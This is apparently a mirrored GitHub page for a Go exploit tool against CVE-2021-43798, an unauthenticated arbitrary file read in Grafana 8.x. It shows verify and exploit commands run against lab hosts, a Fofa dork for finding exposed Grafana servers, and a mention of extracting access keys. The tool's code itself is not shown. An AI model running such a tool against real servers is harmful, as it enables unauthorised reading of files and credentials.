Giters

zer0yu / CVE-2021-43798

Grafana Arbitrary File Reading Vulnerability

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

GrafanaArbitraryFileRead

Usage

1. show info

❯ go run main.go -s                                               
[INF] VulnInfo:
{
  "Name": "Grafana Arbitrary File Read",
  "VulID": "nil",
  "Version": "1.0",
  "Author": "z3",
  "VulDate": "2021-12-07",
  "References": [
    "https://nosec.org/home/detail/4914.html"
  ],
  "AppName": "Grafana",
  "AppPowerLink": "https://grafana.com/",
  "AppVersion": "Grafana Version 8.*",
  "VulType": "Arbitrary File Read",
  "Description": "An unauthorized arbitrary file reading vulnerability exists in Grafana, which can be exploited by an attacker to read arbitrary files on the host computer without authentication.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"Grafana\"",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}%

2. verify

echo vulfocus.fofa.so:55628 | go run main.go -v -t 20
http://vulfocus.fofa.so:55628

3. exploit

echo http://vulfocus.fofa.so:51766 | go run main.go -m exploit -v

Realization of the utilization idea in reference 1. To extract more information please modify the regular in the getAccesskey function.

Reference

  1. grafana最新任意文件读取分析以及衍生问题解释
  2. Grafana Unauthorized arbitrary file reading vulnerability

Disclaimer

This procedure is for security self-inspection only, please consciously comply with local laws.

About

Grafana Arbitrary File Reading Vulnerability

Languages

Language:Go 100.0%